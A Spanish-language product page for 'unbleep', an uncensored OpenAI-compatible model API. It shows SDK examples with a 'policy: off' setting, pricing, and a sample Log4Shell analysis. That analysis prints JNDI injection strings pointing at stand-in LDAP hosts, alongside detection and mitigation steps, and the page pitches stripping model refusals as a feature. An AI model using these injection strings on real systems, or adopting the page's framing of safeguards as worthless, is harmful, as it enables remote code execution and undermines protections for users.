Los modelos convencionales responden con un bip. Nosotros lo quitamos.
Una API compatible con OpenAI y pensada para desarrolladores, con modelos sin restricciones: para red-teaming, evaluación de jailbreaks, investigación en seguridad y todo aquello que no puede permitirse un rechazo fingido.
Se llaman por lo que hacen, no por el modelo de pesos abiertos que llevan debajo, así podemos mejorar los pesos sin romper nunca tu código.
El predeterminado. Una ventana de 256K tokens, sin censura: el caballo de batalla diario para red-teaming, evaluaciones e investigación.
El nivel frontera. Un contexto de 1M de tokens para los trabajos más grandes: bases de código enteras, transcripciones largas, análisis profundo de múltiples documentos.
La opción barata y rápida. Menor costo por token para tráfico de alto volumen y llamadas más sencillas.
Una sesión de red-team sobre Log4Shell: causa raíz, una comprobación segura en laboratorio y la corrección. Sin sermones ni rechazos; solo el análisis.
CVE-2021-44228 (Log4Shell). Causa raíz, y cómo la búsqueda JNDI se convierte en RCE.${…} dentro de las cadenas que registra. Un valor registrado como ${jndi:ldap://host/x} hace que la JVM resuelva ese nombre por LDAP/RMI, descargue una clase Java remota y la instancie: se ejecuta código arbitrario en el proceso de logging. La superficie de disparo es cualquier cosa que llegue a una llamada de log: User-Agent, cabeceras, campos de formulario. Rango afectado: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} en una cabecera que sepas que se registra.<token> significa que la cadena se interpoló → vulnerable. No se sirve nada, así que nada se ejecuta.JndiLookup.class en los jars desplegados y compara las versiones con el rango afectado.2.17.1+. ¿Aún no puedes? Establece log4j2.formatMsgNoLookups=true (2.10+) o elimina JndiLookup.class del classpath, añade una regla de WAF para ${jndi: y filtra en el egress el tráfico LDAP/RMI saliente del host.La API es compatible con OpenAI sin cambios (drop-in). Cambia la URL base y la clave: tu código, tus SDK y tus herramientas actuales siguen funcionando.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node y cualquier herramienta que hable la API de Chat Completions. Nada nuevo que aprender.
text/event-stream de fragmentos delta, terminado con [DONE]: exactamente lo que tu cliente ya parsea.
Envía "policy": "research" para etiquetar una solicitud en tu historial de uso, o "strict" para aplicar una lista de bloqueo, cuando un proyecto lo necesite.
Compra crédito cuando lo necesites, o ponlo en un plan mensual y deja que llegue solo. Cada solicitud se factura por los tokens que consumió realmente, a la tarifa por millón publicada para el modelo que llamaste.
unbleep $3.00 entrada / $3.00 salida
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
por 1M de tokens
Añade crédito con tarjeta cuando lo necesites, o deja que un plan te lo entregue cada mes. No caduca mientras tu cuenta esté abierta, y el crédito sin usar es reembolsable dentro de 14 días.
Reservamos una estimación cuando empieza una solicitud y la liquidamos al costo real en tokens cuando termina. Una solicitud que da error se libera; nunca se cobra.
Una solicitud se rechaza cuando tu saldo no puede cubrirla: nunca extendemos crédito ni te facturamos a posteriori. El saldo y el gasto en tokens están en la consola.
unbleep es para equipos de seguridad, investigadores y desarrolladores que necesitan una línea base sin filtrar. Retención cero por defecto, un dial de política de primera clase, historial de uso y costo por solicitud en la consola, y una política de uso aceptable de verdad. Sin censura es una capacidad: tú decides cómo se gobierna.